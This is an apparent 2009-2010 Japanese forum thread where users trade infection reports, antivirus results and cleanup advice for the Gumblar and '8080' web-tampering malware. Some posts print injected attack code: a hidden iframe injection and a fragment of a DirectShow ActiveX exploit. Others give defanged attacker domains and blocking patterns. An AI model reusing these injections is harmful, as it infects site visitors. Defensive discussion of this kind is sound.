【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
改ざんされたWebページを経由して感染するウイルスの情報・対策スレです
ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加しているようなら別スレを立てて誘導してください
現時点でGumblar(GENO)、8080(/*GNU GPL*/ や /*CODE1*/)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***
【関連スレ】
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
【8080系ウイルスについて】
Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*GNU GPL*/
または
<script>/*CODE1*/
から始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を利用していますが
こちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106
●IPA 情報処理推進機構
Windowsの自動実行(オートラン)機能を無効にする ※USBメモリの使用に関わらず必ず設定しておくこと!
ttp://www.ipa.go.jp/security/txt/2009/05outline.html ・Microsoft Updateは確実に適用しましょう (*「カスタム」選択更新で適用にエラーが無いか?は確認出来ます)
・ブラウザの「インターネットゾーン」のセキュリティ設定項目は、自分でよく理解して管理しておきましょう
感染するとブラウザ設定を低下させたり、悪意のあるサイトURLを信頼済みサイトへ登録するスパイウェアも存在します
・普段のブラウズは、サードパーティCookieをブロックする設定以上にしておけばスパイウェア予防にもなります
・「アドオンの管理」から、普段ブラウザで読み込まれるアドオン(Webブラウザ拡張機能)の内容は把握しておきましょう
・ソフトウェアやブラウザ(Webプラグイン類も)の最新版Updateとセキュリティ設定を常に心掛けましょう
(*Adobeソフト、動画Player、圧縮解凍ソフト、Office系ソフト、Mailソフト、Sun MicrosystemsのJavaなど)
(*普段、使わないようなWebプラグイン類はアンインストールしておきましょう → 必要時だけ最新版を使用する)
・インターネット上の「無料で配布されているモノ」は、基本的には“疑って”下さい (*VirusTotal.comスキャンを活用)
・怪しいメールや圧縮ファイルは、絶対に開かないようにしましょう (*危険な餌に釣られない用心を持ちましょう)
・週に何回かは、Nortonで「システムの完全スキャン」を実行しましょう
・スキャンでリスクが検出された場合、駆除と同時にSymantecのサイトでリスクによる「被害内容」を確認しましょう
・「タスクマネージャーの常駐プロセスexe」の内容も把握しておきましょう
・Windowsの付加的「サービス」は、攻撃の侵入経路に利用されることもあるので脆弱性となる項目は停止しておきましょう
・大事なIDやパスワードの自己管理には十分に注意しましょう (*IDセーフ機能も活用)
●Webサイトの脆弱性、IPAから指摘しても6割が対応未完了 2009/7/24
サイト運営者やDNSサーバー管理者、Webアプリケーションの開発者に対して脆弱性の確認と対策の実施を求めている
ttp://internet.watch.impress.co.jp/docs/news/20090724_304366.html
*** テンプレ終了 *** 抜け、間違いがあれば指摘よろ
8 :
1 :2009/12/27(日) 04:26:14
ごめん続けて
*** テンプレ終了 ***
いきなり荒らし?
>>9-11 ってノートンスレのテンプレであって関係ないよな?
【ヤフオク】Nortonキー出品まとめA・悪い評価 ■fantastic_kids_1999 特別に提供されたものを使用したが使えなかった。代替えとおまけで他の出品も提供されたがそれも使えなかった。 結局何も使えなかった。こんなやつの出品は所詮こんなもんでしょう。 (評価日時:2009年 6月 13日 15時 11分) ■intelli2009 プロダクトキーが使えなくなり、有効期間も0日に…詐欺でしょうか?(評価日時:2009年 9月 17日 7時 03分) ■number2009livecn(停止中) 期限切れ (評価日時:2009年 11月 5日 11時 08分) ■uxk1216 落札当初、2年間の有効期限と説明を受けていたが、3ヶ月目で更新期限切れが来てしまいました、 どういう事でしょうか? (評価日時:2009年 10月 25日 22時 24分) ■min9763557(停止中) 購入時は認証できましたが、3ヶ月もせず期限切れになりました。許せません。 (評価日時:2009年 11月 12日 17時 29分) ■yuanchong525 こいつはすぐに期限が切れるものを売りつけてます。詐欺です。 まあ騙された自分が馬鹿だったんですけど、みなさんも気をつけてください。(評価日時:2009年 9月 13日 22時 49分) ■seven_stars_king2000 Yahoo! JAPAN IDが無効です。 ■andriy_shevchenko1976929 Yahoo! JAPAN IDが無効です。 ■bottega_choice(停止中) 落札、代金支払後に取引停止となり、メール送信しても連絡無く、最悪です。 (評価日時:2009年 10月 20日 17時 03分) ■wxk1216(停止中) 海賊版でした。7日後に期限切れになりました。サポートも不可 (評価日時:2009年 10月 7日 21時 41分)
17 :
名無しさん@お腹いっぱい。 :2009/12/27(日) 05:34:27
____
n /⌒ ⌒\
| | /( >) (<)\
i「|^|^ト、/::::::⌒(__人__)⌒::::\
>>1 乙だお!
|: :: ! } | /| | | | | |
ヽ ,イ \ (、`ー―'´, /
いきなり嵐にはわろうた
>>1 乙
8080(/*GNU GPL*/ や /*CODE1*/)って
いまのところ検知するのノートンとAVASTだけなの?
他のソフトはスキャンでもスルー?
>>21 (/*GNU GPL)踏んでカスペオンラインチェックで出てこなかったってどっかで見たけど
8080系で
>>4 みたいな感染確認は無いですかね?
感染の疑いがある場合はAvastとか検出報告のあるソフトで試してみるしか確認も出来ないってことですか? ポートチェッカーで80や8080が解放されてるものの応答は無し判定だったんですが やはり黒でしょうか
>>26 avast!は比較的スクリプトには反応するが
ウイルス本体を検出するかは検体を持っていないから分からない
個人的な印象になるが、ウイルス名やファイル名でググって見ると
本体の検出はKaspersky・Microsoft・Symantecあたりが強そうかな?
PCに詳しくないなら
ウイルス対策ソフトでフルスキャンをかけていろいろ検出したら
クリーンインストールが無難だろうな
28 :
26 :2009/12/27(日) 17:32:24
>>27 そうですか・・・
一応常駐インスコしてあるマカフィーでフルスキャン、カスペオンラインでスキャン
トロイスレに貼ってあったトロイスキャナーでオンラインスキャンして
何一つ検出されませんでした
(トロイスキャナーで有害度の低いクッキーがちょろっと出てきたのみ)
siszyd32.exeも出てこずMSアップデートも問題なく、再起動も出来てるのですが
これはもう白なんですかね
一日経過しましたが、いまのところプロセスにおかしな挙動をしているものは見当りません
確かに踏んだサイトには/*GNU GPL*/ のスクリプトが挿入されてたようなんですが
あ、あとsymantecのポートチェックもやりましたがこっちは全部白でした (8080系のポートはチェック対象外のようでした)
>>28 それだけスキャンしてクッキーくらいなら白、なんだろうな
どういう経緯で感染したと思ったのかが分からないが
サイト踏んだと同時にアンチウイルスが反応したんなら
水際で阻止しているだろうし、アップデートで対策されてたら問題ないはず
>>30 いえ、あっちのスレこっちで黒判定されてるサイトを迂闊に踏んでしまって
(偶然すぐに閉じてはいたのですが、マカフィーは無反応
その時は感染サイトだとは気付かず)
感染サイトだと知ってから携帯で該当サイトをもう一度踏んでみて、サイトの最下部に/*GNU GPL*/ を含む
恐らく難読化されたスクリプトが挿入されてるのを見まして
ちなみに踏んだのはGENOスレ290注意喚起されてたサイトなのですが、現在ではスクリプト部分は削除されているようで
今となっては再びの確認が取れません
IEでJAVAスクオンで踏んだんですが、何故生き残ったのか・・・
生き残ったのなら幸いですが、定義ファイルが追いついていないだけだとすると怖いものがあります
とりあえず様子見してみます。ありがとうございました
>>24 ノートンは実際にサイトに訪問したとき反応する
virustotalでスクリプトの部分をスキャンしても反応しない
つまり一度感染したらAVAST以外で確かめる術がないってこと? でもAVASTも誤検出騒ぎで落ち着かないよな どうすりゃいいんだ
34 :
32 :2009/12/28(月) 00:38:53
>>33 感染後のことは知らない
あくまでもスクリプトのスキャンの話
>>33 どっかに書かれているだろうど
OSに最新のアップデートを適用しておく
Adobe製品やSunのJavaなどがインストールされていれば同様にアップデートしておく
Adobe ReaderはJavaScriptを切っておく
どうしても不安ならwebブラウザのJavaScriptを切っておけばほぼ無害
機種によるかも知れないがルーターで切ることも出来る
>>36 いや感染(疑い)後の話よ
どのスキャンでも上がってこないらしいじゃん
あとはHIPSの強力なファイアウォールなどのセキュリティ製品を使う 設定もよりきつめにすれば思わぬマルウェアの実行やファイルやレジストリの書き換えも防げる 確証はないがほぼ防げるんじゃないだろうか Outpost、Comodo、Online Armor、PC toolsなど
>>37 そこまで心配する人なら、疑いのあるサイト行ってしまった自覚があるならOSごとクリーンインスコが精神上一番良いと思う
日々コードも引き連れてくるマルウェアも変化してるものに、どこのベンダーのものが100%検知可能!とか言えない
GumblarなんてHijackThisでも見つけにくいとか報告あったし
あと肝心なことは 感染してもすぐに復旧できるようにバックアップを取っておく
>>39 ない
踏んだって話は色々見かけるが、どうなったっていうレスを見ない
誰か実際やった奴いないんだろうか
webサイトを管理してるなら パスワードを変更するのも忘れずに 感染しても今のところweb改竄の被害を受けるだけなのかな 俺がはやりのGNU GPLのスクリプト試したときはpdfup.exeと言うのが落ちてきただけだったな
45 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 01:10:34
試す環境がある人でも2回目のアクセスの時は404返すようになったりと素晴らしい工夫がなされてたりして
検証しにくかったりするんだよな
俺は仮想環境とかないのでやったことないけど・・・・
>>44 パスワード変更するのは良いが、感染してないって言い切れる環境でのパスワード変更ってのが必須だな
感染してる環境からパスワード変更はまったく意味ないしw
8080系の奴ってSo-netの記事によると、改竄だけじゃ済まないみたいよ
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2104 >ちなみに、攻撃成立時に実行されるウイルス本体は、「Bredolab」や「HDrop」で検出されたり、汎用名で検出されたり、検出できなかったりと、こちらも微妙だ。
>困ったことに、このウイルスは他の不正なプログラムをダウンロード・実行するのが主な役目で、実行時にシステムに何がインストールされたかがわからない。
>情報を盗み取るスパイウェアやパスワードスティーラ―、外部からパソコンを操るためのボット、偽ウイルス対策ソフトなど、これまでに様々な脅威をインストールして来た系列のウイルスだ。
48 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 01:13:04
>>45 貼っちまったよ・・。
対策ない奴は、絶対開くなよ。
>>46 分からないって書いてあるじゃん
分かってないのか分かってないのか微妙な文章だが
分かってないのか分かってるのか微妙な文章だw 最後はこういうウイルスの一般的な動作を述べてるだけじゃないか
51 :
46 :2009/12/28(月) 01:17:22
レスした後再度読み直してみたら、微妙な文章ですね・・・ まあでも、最悪こういう自体になりかねないよって言う脅しには良いんじゃないかと・・・
52 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 01:29:27
たしかアニたまのサイトもそれだった気がするんだが あんまり大きな騒ぎにはならなかったよな 潜伏してるのが多いのか?
今騒ぎになってきてるじゃないですか。ゼロデイ突いてくるドライブバイダウンロードが有名サイトにぞくぞくとってことで
adobeもjavascriptとか最初から危なっかしいの分かるような機能入れるなよ ちゃんと対応できるならまだしも全然駄目じゃないか アホすぎ
57 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 01:45:29
58 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 01:47:36
>>57 まさか、ウィルススキャンでチェックしてスルーしたからセーフとか言ってないよな?
60 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 01:51:09
デジマガ/*GNU GPL*/あるな
で、
>>57 は踏んだのか? どうなった?
62 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 01:56:24
>>61 ここに行こうとしてるな。
adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080
やられてるだろ。これ。
63 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 01:58:05
>>61 adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080
ここに向けてリクエスト出してんぞ。
まぁ確実かな。
pdfupd.exeが落ちてくる virustotalではどれも検出しない
>>62-63 普通踏んだら速攻で(この場合はロシアから)何か運んでくるものなの?
初心者でゴメン
なんかファイルができたとか、そういう話は今回あまり聞かないよね
pdfupd.exeを実行する何かダウンロードして _ex-68.exeを実行しようとするのでこの辺でやめといた
>>65 いかにユーザーに感染したのが分からないように感染させるのかがマルウェア制作者の腕の見せ所
>>64 .66
どうもありがとう。踏んでてpdfupd.exeが隠しファイル含めて上がってこなかったらセーフかな
>>65 踏んだら速攻でダウンロード実行される
ドライブバイダウンロードというやつか
適切なアップデートをしておけば問題ない
もちろんセキュリティソフトが停止させる場合もあるが
70 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 02:12:18
>>68 「上がる」って、JREやFlash経由で落ちてくるから、ダウンロードポップアップはおろか、IEのキャッシュにも残らない可能性があるからな
念のため言っておくが。
>>70 いや試したのはJAVAもFlashもインストールされてない環境だ
MSの脆弱性かな
もちろんJAVAやFlashの脆弱性を突かれた場合は同じような動作をするかどうかは分からない
実行ファイルも残らないの? セキュソフトの定義更新が間に合ってなかったら、もう感染確定の判断はできないのかな バカでゴメン
>>72 テストしたときは残った
ただテストでは最後まで実行させず途中で終了させた
最後にすべて削除するようなこともあるかも知れない
まあ分からないってことだ
>>73 そっか・・・ありがとう
とりあえずPCの挙動が安定してるうちは様子見して、各種セキュソフトの対応待つよ
75 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 02:27:02
難読化といてみると、ただJSを落としてるだけっぽいな。 他のJSをダウンロードしてる先が、ロシアってことか。 そいつがさらに脆弱性ついて、ドライブバイダウンロードするって事か。
あ、ごめん
直リンしちまったじゃねえか
>>76 はウイルス
注意
79 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 02:43:33
>>79 マイクロソフトのActiveX
MS09-032あたりじゃないかな
82 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 02:53:23
>>80 ありゃ。やっぱゼロデイか。PDF切っとくか。
>>82 pdfupd.exeは
>>81 氏が言うActiveXの脆弱性突くものかもしれないけど、ゼロデイ攻撃始まってるのも事実ってことで
今回はマイクロソフトのActiveXの脆弱性を突かれてpdfupd.exeがダウンロード実行されたってこと Adobe Readerがインストールされていれば違った攻撃もあるかも知れない
>>78 みる限り、各ベンダー全滅、かろうじてカスペが引っかかったりしなかったりで
後はGENOみたいにPC立ち上がらなかったりするような分かり易い症状もないってこと?
GENO系の全てに黒画面にマウスカーソルの症状が出る訳じゃないんだけど
上にもあるように ノートンやAviraなどはファイルスキャンではなくwebサイトにアクセスすると検出する仕組みになってる AviraフリーはWebGuardが無いから注意が必要だが
>>78 はpdfupd.exeの検出結果のみであって、どのファイル・コード・タイミング・振る舞いで検出するかもベンダーで違うだろうしなんとも言えないな
ヒューリスティックで捕まえる場合もあるだろうし
ただ
>分かり易い症状もないってこと?
これはYesって言っといた方が対策する人も増えるか?
89 :
87 :2009/12/28(月) 03:21:34
ごめん AviraはWebGuardじゃなくても検出するかも知れない 検証はしていないので分からない
>>76 WebGuardなくてもAviraで検出することを確認
>>91 avastは誤検出しまくってるようだが
そのせいではないの?
95 :
94 :2009/12/28(月) 04:10:59
ちなみにノートンではダウンロードしようとするときに検出するが virustotalで検出されない
JAVAが無いときは Adobe Readerも利用されるね
98 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 07:20:25
win.jpg はDirectShowのMS Video ActiveX Control(CVE-2008-0015)の脆弱性攻撃。 JavaGame.jar はJRE(CVE-2008-5353)の脆弱性攻撃。 pdfupd.exe はAdobe Readerの脆弱性攻撃用の ChangeLog.pdf が落として来て実行するトロイの木馬本体。 他のルートでも最終的には同じものが落ちて来て、このトロイの木馬が Bredolab とか HDrop とかで検出されるはず(でも今は全然検出してくれなぁ)のダウンローダです。 ダウンローダが、その後何をダウンロードしてくるかは、その時の攻撃者の気分次第。 攻撃側が用意したものを何でもインストールできちゃうわけね。 実行してみれば、その時点で落ちて来るものは分かるんだろうけど。
99 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 08:37:05
何か役に立つかもしれないので報告 fxwill●comにウイルスがあると聞き試しに見てみた(←阿呆) /*GNU GPL*/〜というコードが埋め込まれてたっぽい ↓ サイトを開くと このファイルの実行を許可しますか?というウインドウが出てきて(VISTA) 「キャンセル」を押しても再度同じウインドウが表示 何度押しても同じでそのうち画面が固まる ↓ 再起動して、通常起動でウインドウを開始すると マイクロソフトセキュリティーエッセンシャルが反応 詳しい表示は憶えてないけど、表示されたファイルの削除を選択(履歴見ても何も残っておらず詳しいことが不明) ↓ PCはそのまま使えていたので安心していたら、 出先で自分のサイトを携帯でみたらエラー500が表示されるのに気づく ↓ 家に帰り、サーバーの履歴を見ると感染源のサイトを見た直後から複数のIPでログインされてた。 そしてパソコンの電源を切って外出した時間あたりでログインも止まっていた。 ↓ もう1台のパソコンからFTPのパスワードなど変更 サーバー上のファイルも消去 ファイルを見るとindex.html index.php 〜.jsファイルがほぼすべて最下部に/*GNU GPL*/〜が埋め込まれていた。 ↓ 問題のPCにカスペの体験版を入れて(オンラインスキャンが停止中なので)みたら スタートアップにsiszyd32.exeが検出されたので削除。 ↓ 今ここ もうこれ再インストールするしかないんでしょうか。
100 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 08:42:16
追記 説明がわかりにくいね 自分のサイトはレンタルサーバー上にあり FTPで更新しています。
>>99 感染した状態でサイト更新した?
それともFTPとか使ってなく自サイトにアクセスした覚えがないのにパス抜かれて改ざんされたの?
102 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 08:58:22
>>101 レンタルサーバーは2つ借りていて
片方はWORDPRESSの管理画面からログインはした。
でももう一方は数カ月まったく使っていないサーバーで
念のためにもう一台のパソコンから調べたらしっかりファイルが書き換えられてた。
どちらもFTPソフトにパスワードは登録していた。
サイト閉じてとっとと再インスコしろよ…
105 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 11:41:07
106 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 12:38:09
どもども、99です サイトは閉めてサーバー上のファイルは全部消してるよ 今、PCの再インストール中 いらんソフトとか捨てるいいきっかけになったよ、スッキリ
>>106 FTPクライアントは何使ってるの?
パスワード保護に強いのはないかな?
FileZilla使ってるけど全く暗号化してないしこれ最低だよな
これってオンラインゲームのIDもとられるの?
そんなチンケな物はとらんよ、たぶん
110 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 16:35:05
>
>>107 FFFTP使ってる
サーバーのログイン履歴詳しく見てみたけど
やっぱりパソコンの電源切った時からログインがなくなってる
感染から外出まで1時間、外出から帰宅まで4時間
感染
↓
感染に気付かずPC電源切り外出
↓
帰宅
電源切るまでは、ほぼ10秒単位でランダムなIPからログインあり。
その後帰宅するまでまったくログインなし。
あと、/*GNU GPL*/〜というコードの最後に規則的な英数字が0〜300個ずつ改行されてくっ付いてた。
一応参考までに報告
111 :
名無しさん@お腹いっぱい。 :2009/12/28(月) 22:49:21
「思い立ったら書く日記」と「べつになんでもないこと」はググって必ずチェックすることをオススメする。
遠慮しとく
感染確認に 適当なフリーページ登録してFTPでアップロードしてみりゃいいのかな?
某ブログで見たが8080系はWinampの脆弱性も突くのか?
Winampの脆弱性ってのもよくわからないんだよな。 俺は必要十分余計な機能は欲しくないという理由でいまだに2.81を使っているんだが、現行とは 系統が違うこのあたりの古いバージョンにも同様の危険性があるのかねえ?
Winampは何度か脆弱性が話題になってるよな 出来れば最新を使うか使わない方が良い
118 :
116 :2009/12/29(火) 18:08:06
WAN接続はCDDBからの情報取得だけでファイルを直接再生することは皆無なんだけどね。 最新版への更新も検討してみるかな。
119 :
名無しさん@お腹いっぱい。 :2009/12/29(火) 23:28:07
>>115 この辺のことか?
| var ovCEkVSTS = document.createElement('object');
| document.body.appendChild(ovCEkVSTS);
| ovCEkVSTS.id = 'IWinAmpActiveX';
| ovCEkVSTS.width = '5';
| ovCEkVSTS.height = '5';
| ovCEkVSTS.data = './pics/win.jpg';
| ovCEkVSTS.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
| var tIx8bqnvuS = *** ShellCode ***
IWinAmpActiveXって名前付けてるけど、呼び出してるclassidはDirectShowだよ。
そんで、MSVideoの脆弱性(CVE-2008-0015)搭載のwin.jpgを食わせてShellCode実行!
違うだろ
122 :
名無しさん@お腹いっぱい。 :2009/12/30(水) 13:24:05
このウィルスって各ベンダーのスキャンで発見できるの? FTPにファイル上げるときに、同じく登録してあった別パスぶっこ抜かれて全部改竄されたって話だけど 逆にFTPにパス保存してあっても、実際に起動して更新作業しない限り サイト改竄は免れんの? それとも感染直後に(感染後FTP未使用でも)勝手にパス抜きされて接続、改竄なの?
123 :
名無しさん@お腹いっぱい。 :2009/12/30(水) 15:22:39
8080用チェッカー作った
124 :
名無しさん@お腹いっぱい。 :2009/12/30(水) 16:30:26
Gumblarは新コードのテスト中?
<script src=h
ttp:// 「中略」.php?op=java ></script><body>
俺もやれたんだけど FFFTPに登録してあるサイトが全部がやられた 接続してないサイトもやられてたから どれか1つ接続するとリストにある奴が全部やられたってことだな つまりこれってFFFTPがハッキングされたことになるのか? 他の感染者がどのFTPソフト使ってるのかわかないからなんともいえないが というか感染してからまだウィルスだと気づいてないとき自分のサイト見たら AVGが反応したんだが、つまりウェブ上からは感染は防げてたってことだから 最初の感染はローカルってことになる pdfとか見てたからやっぱり感染元はこれっぽいな
感染したときに設定読み取るのかもよ
127 :
名無しさん@お腹いっぱい。 :2009/12/30(水) 19:27:20
>>121 うっ!ほんとだ。
2年ぐらい前のAOL Winampの脆弱性ぽいっすね。
わざわざインストールさせようとしているcabを落としてみたら
2005年4月版でやんの。何でAOLはこんな古いの置いてんだ。
>>99 見てると、UAC有効にしてても効果がないってことか
俺はどこも信用できないね
>>129 せめて文字コードぐらい指定してくれ
IEで開いたら文字化けしてびびったw
ウィルスかた思ったぜw
もうネットにつながないから この脅威が去ったら電話くれ!
133 :
名無しさん@お腹いっぱい。 :2009/12/31(木) 10:25:50
結局、感染したらFTPで鯖にファイル上げるしか確かめようは無いのか? 感染した奴は皆このルートで判明?
>>131 ごめんなさい><文字コード指定しました
ここに張ってるURLは危険そうですな
/*GNU GPL*/踏んだ可能性があるんだけど spoolsv.exeってのが新たに出来てる気がする これ関係ある?
>>136 spoolsv.exeはプリントスプーラだよ。
プリントジョブの仕掛かりが溜まってない?
138 :
名無しさん@お腹いっぱい。 :2009/12/31(木) 13:24:17
>>137 いや、それが少なくともここ1年はプリンタにつないでないPC
なのにマカのファイアーウォールの設定でもいつの間にか送受信完全に許可扱いになってる
そもそもタスクマネジャでメモリ使用上位にそんなのは今までいなかった気がする
で、spoolsv.exeでググったら、トロイの偽装の可能性と出てきたんで
でもフルスキャンしても何もでてこないし
CPU使用率は安定してるし
少なくとも表面上はPCがどこかにアクセスしっぱなし、と言う風には見えないし
もうどうすりゃいいんだか
>>131 乙
ついでに、Gumblarの簡易チェックも組み込めないかな?
</head><script src=
http://*.php ></script><body
これがあったら黒判定って事で。
>>138 サービスを殺しても生きてたら
変なのが寄生してると思われ。
>>138 Process ExplorerかSlightTaskManager(これはXPまでらしい)でspoolsv.exeのパス(フォルダ)を
確認して、spoolsv.exeのファイルのプロパティで作成日時、更新日時、等がおかしくないか確認。
その後、spoolsv.exeをvirustotalでチェックする、くらいしか思いつかない。
142 :
138 :2009/12/31(木) 16:06:59
>>140-141 Process Explorer等入れてないんで(この状況下でネットつなげないし)
マカのアクセス許可設定にあったパス(system32以下)でプロパティチェック
作成日時、更新日時は随分前のまま変わらず(少なくとも踏んだ可能性のある日じゃない)で56.5kb
メモリの使用量は38.956
ネットきってるんでvirustotalに確認にいけてないが、なんとなく白っぽい
気がするんだがどうか
サイト管理者以外で、/*GNU GPL*/感染確認するには、本当どうしたらいいんだろうか
spoolsv.exeはOSにデフォルトで入ってるだろ
>>143 もちろんそうなんだが
どんだけスキャンかけても何にも引っかからないんで、
とりあえず普段と(多分)違う挙動のものを虱潰しにしてるんだよ
spoolsv.exeがトロイ偽装のケースもあるって話しだし
/*GNU GPL*/感染で、実際にどんな症状が出るかってのが全く聞こえてこないんだが
サイト改竄以外に何があるんだ?
つうかPC調子悪いときに携帯規制とかキッツイ
>>139 今回のバージョンアップの際に簡易的にチェックするようにしました。
もしかしたら誤検出があるかもしれません
>>144 別のウイルスをダウンロードしてきます。
どこの馬の骨だよ
>別のウイルスをダウンロードしてきます。 今回感染後も普通にPCつかえてて、自サイト改竄が発覚して漸く感染に気づくとか そんなのばっかりな気がするけど /*GNU GPL*/感染のケースで他のウィルス呼び込んだ事例あがってんの?
紅白FLASH合戦スレで/*GNU GPL*/報告出たけどスルーされてたな 何人か開いちゃったんじゃないのあれ
149 :
名無しさん@お腹いっぱい。 :2009/12/31(木) 22:37:48
なんかあっちこっちのスレで/*GNU GPL*/のURL貼られてる割に いまいち騒ぎになってないよな JRやホンダまで感染したのに、そこを踏んで自分が感染したっていう犠牲者の声が少ない GENOのときはPC再起動不可っていう分かりやすい(といか致命的)エラーが出たから 皆感染が分かったけど 今回は自覚症状無いまま、感染後そのままPCで飼ってるやつ多い気がするんだが
アドビ関係全部アンインスコして専ブラで2chだけを見るネット生活を八ヶ月続けてるが それでも不安が拭えない
オミで/*GNU GPL*/を含むscriptタグを殺しちゃえばいいんじゃね
>>149 Gumblarの時にはコマンドから起動出来る出来ないや
ファイルのサイズでで見分けられたりしたけど
今回はどうやって見分けるかのかまだよく分からないしなあ・・・
各種アンチウイルスソフトは感染しているときちんと動作するのかとかも。
違法ファイルのダウンロードの法律よりも、故意にウイルスばらまいたやつに
罰則強化とかしてほしい。
今回のは感染後、各ベンダーのサイトが開けなくなったとか MSアップデートが出来なくなった、とかそういう話も聞かないよな 今のところは「FTPでパス抜きされたあと」から、10秒単位で不正アクセスっていう コレくらいしか目立った特徴は出てない気が
年明け早々、会社のWEBページが改ざんされたw 形態に電話があり、今から出勤、最悪。 Gumblar再開とかかいてあるし、何されてるのか。 正月休みもパーだな。
脆弱性対策をしててもプラウザのJavaScriptがオンなら、8080サイトからマルウェアが自動的に ダウンロードされて、発動はしなくてもPC内に残るのかな?もしそうなら、それはそれで気持ち悪いな
Adblock Plusの存在を忘れてた・・orz ・8080 *:8080*$script,link,object ・Gumblar *.php$script,link,object
カスペルスキーのオンラインウイルススキャンは現在は停止中なのかな?
161 :
age :2010/01/01(金) 18:02:21
某所から転載
--ここから--
www●ideele●nl/a-home.htmに埋め込まれたコードの難読化を解除すると
<iframe width=1 height=1 border=0 frameborder=0 src='h
ttp://sodanthu ●com/in6.php'></iframe>
--ここまで--
↓同一のコードが仕込まれてる↓
tp://rcmorningstar●com/cp/scripts/formmail-doc/example_src●html
因みに
>>129 のチェッカーはスルーする。
チェッカーだめじゃんw
>>159 30日くらいにモームス板(?)に
"超一流芸能事務所スターダストのホームページにトロイの木馬"
ってスレが立ってたようだけど、それかな?
スレ自体は直ぐに落ちた様だけど。
avast!だと、JS:Illredir-B [Trj] で
カスペルスキーだと Trojan-Clicker.JS.Iframe.db なのかな?
先日、avast!が JS:Illredir-B [Trj] をブロックしてくれたのかも知れないけど
個人ブログとかにも広がってるかも。
165 :
名無しさん@お腹いっぱい。 :2010/01/01(金) 19:12:58
>>110 乙です。
感染すると自動的に他のPCから他のPCからかきかえにくるのかな。
ボットか何かかな。
カスペのオンラインでもいまだと検出されるの?
>>160 ニフの方も止まってるの?
>>166 ニフティの方は分からないけど、公式(日本語)サイトの方は
年末年始って事なのか停止中っぽいけど。
168 :
161 :2010/01/01(金) 19:48:25
"<script>function" "return String.fromCharCode(c);" "getElementById(" 高確率でヒットするので、これで捜索中・・・
>>167 ニフの方はいけたはずだけど、中身同じじゃねえの?
よくよく読んでみたら、上で報告の上がってる
>>99 ってFFTTP起動させるまえ、
感染サイト踏んだ直後から自サイトにアクセスされて書き換えされてたって事?
となると、踏んでアウトなら、
その瞬間にFTP起動有無にかかわり無く速攻保存してある管理パス抜かれて
改竄されるって事か
FFFTPだった。まあいいや
173 :
◆774......E :2010/01/01(金) 23:06:02
GNU GPLのやつなんてファイアウォールで アウトバウンド制御してるだけでも防げそうだけどな 感染した人は入れてないだろ
>>175 そう言えば
なぜかファイアウォールのアウトバウンド制御はいらないとか主張するやつが最近増えてたな
それだけでも防げることなのに
シナの留学生が工作してるんだろw
中国のIP防ぐだけでもかなり安全になるよね
"fff=op.split(" "fff.op.replace(" の検索結果 約 14,200件
>>172 サイトのタイトル
惡意連結網址列表 (Malware Domain List) | 資安之眼
実際に表示されるサイトのURL
ttp://www.itis.tw/badlink IPアドレス
60.248.88.10
逆引きホスト名
ns1.misway.com
あーわかった FFFTPのインポート/エクスポートってレジストリファイルを読み込み/出力してる だからGumblarはレジストリからFTPでアクセスする(改ざんする)サイトをみてるわ FTPソフトってどれもレジストリいじってるのか? てっきり普通のファイルに保存してるのかと思ってたぜ
FFFTPはini保存もできるし、パス抜きは普通にポート見てるだけだろ。 FTPは平文で、だからSFTP使えって話になってるんだよ。
>>183 >>125 の状況みるとポートだけ見てるだけではないと思うが
レジストリにFTPのIDとパスを書き込んでるんから
そこで見破られたんじゃないかという話
SFTP使ってもレジストリいじるソフトなら意味んじゃないか
まあ感染してない奴が憶測で言ってもしょうがない
186 :
名無しさん@お腹いっぱい。 :2010/01/02(土) 23:35:36
Unmask Parasites. Blog.がものすごく詳しいな。
うわまたきてるww 放置してたんでパス変えるの忘れてたサイトみたらやらてたw 時間は2010/01/02 23:27 やっぱ感染するとFTPのIDとパス盗まれてるわ FTP接続しなくても改ざんされてるww
F-Secureはこれ検出すんの?
じゃあ、ウィルスサイト踏んでも、FTPインスコ済みID記憶済み、FTP未接続で サイト感染が無ければ白ってことか?
>>186 のブログの翻訳を読んでみたが
今発病してるサイトの運営者はだいぶ前から感染していて
すでにFTPのIDとパスは盗まれてるようだ
だからウィルスまいた奴の好きな時間にサイトを改ざんできる
防ぐにはFTPのパスを変えるしかなさそうだ
だいたいこんなかんじじゃね
GNU GPL踏むとFTPのIDとパスがあれば盗まれる
サイト運営してない人はたぶん無害かも
